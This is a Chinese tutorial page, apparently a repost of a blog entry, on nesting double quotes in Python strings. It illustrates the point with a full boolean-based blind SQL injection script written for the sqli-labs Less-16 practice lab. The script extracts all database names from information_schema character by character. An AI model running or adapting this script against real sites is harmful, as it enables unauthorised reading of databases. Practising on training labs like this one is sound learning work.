[Python知识库] python 字符串双引号中包含双引号

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> Python知识库 -> python 字符串双引号中包含双引号 -> 正文阅读

[Python知识库]python 字符串双引号中包含双引号

有点搞笑，因为这个点是看php代码学到的。很简单，为啥我自己想不到咧。。

先来看提供灵感的php代码：

比如sqli-labs的Less14，源代码中首先采用字符串拼接的方法给用户输入的参数两侧增加了双引号，并赋值给变量（下图57，58行），然后把这个变量放在双引号括起来的sql语句中（59句）。

python有点不一样，不过大体思路差不多。以sqli-labs的Less16中获取系统所有数据库名的函数为例，这关的闭合是")，payload1的值也是用双引号闭合的，因此先将字符串ele")设置为变量ele，然后再在payload1中用加号和其他部分拼接。

#!/usr/bin/python3
# coding=utf-8

"""
functions for boolean-based sql injection(GET)

:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""

import requests

url = "http://192.168.101.16/sqli-labs-master/Less-16/"               #有可利用漏洞的url，根据实际情况填写
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",}    #http request报文头部，根据实际情况填写
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、可见特殊字符
flag = 'flag.jpg'                                        #用于判断附加sql语句为真的字符，根据网页回显填写
ele = 'ele")'

def Databases16():
    n = 100                                                                      #预测当前数据库名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j<n and j-k>3:
            payload1 = ele+" or (length((select group_concat(schema_name) from information_schema.schemata)))>"+str(j)+"-- ss"           #所有payload根据实际情况填写
            param = {
            "uname":payload1,
            "passwd":"pass",
            "submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers)     #GET方法发送含payload的request
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload2 = ele+" or (length((select group_concat(schema_name) from information_schema.schemata)))="+str(i)+"-- ss"
                param = {
                "uname":payload2,
                "passwd":"pass",
                "submit":"Submit",
                }
                response = requests.post(url, data = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of current database contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload3 = ele+" or substring((select group_concat(schema_name) from information_schema.schemata),"+str(i)+",1)='"+c+"'-- ss"
            param = {
            "uname":payload3,
            "passwd":"pass",
            "submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers)
            if response.text.find(flag) != -1:
                db = db+c
                break
    print("the name of databases are "+str(db))